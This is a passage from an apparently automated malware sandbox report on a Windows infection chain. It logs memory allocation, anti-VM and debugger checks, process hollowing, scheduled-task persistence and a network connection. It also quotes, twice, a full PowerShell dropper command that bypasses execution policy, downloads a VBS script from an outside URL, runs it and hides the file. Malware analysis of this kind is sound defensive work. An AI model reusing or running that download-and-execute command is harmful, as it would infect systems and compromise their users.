                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 9070000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 73D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 11E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2D20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2C30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3010000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3200000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5200000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 26C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2980000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 29B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 49B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 50B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 60B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 61E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 71E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 7570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 8570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 50B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 61E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 8210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 9210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: A210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 7750000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: B210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: C210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: D210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 4790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3190000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 18C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3270000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3180000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: EC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2A40000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: F70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 7160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 74C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 84C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 8160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 9160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 14D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3040000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: EF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2A60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2870000 memory reserve | memory write watch
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5675
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4069
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeWindow / User API: threadDelayed 3969
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeWindow / User API: threadDelayed 5853
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740 Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\wscript.exe TID: 7184 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7436Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8164Thread sleep count: 40 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8164Thread sleep time: -36893488147419080s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 2632Thread sleep count: 3969 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 2632Thread sleep count: 5853 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 1652Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 3088Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 1860Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                        Source: wscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                        Source: GFKMTE.exe, 00000016.00000002.1489866475.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                        Source: GFKMTE.exe, 00000017.00000002.2513164888.0000000001398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^W
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                        Source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1492087570.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477180615.0000029430A1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1467671580.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1476093130.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2517390624.000002DD7D42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2523382410.000002DD7EC5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: GFKMTE.exe, 00000016.00000002.1489866475.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess queried: DebugPort
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\System32\wscript.exe Network Connect: 94.156.167.57 443
                        Source: Yara match File source: amsi64_2892.amsi.csv, type: OTHER
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTR
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -windowstyle -command hidden consent.exe;(new-object system.net.webclient).downloadfile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').attributes += 'hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
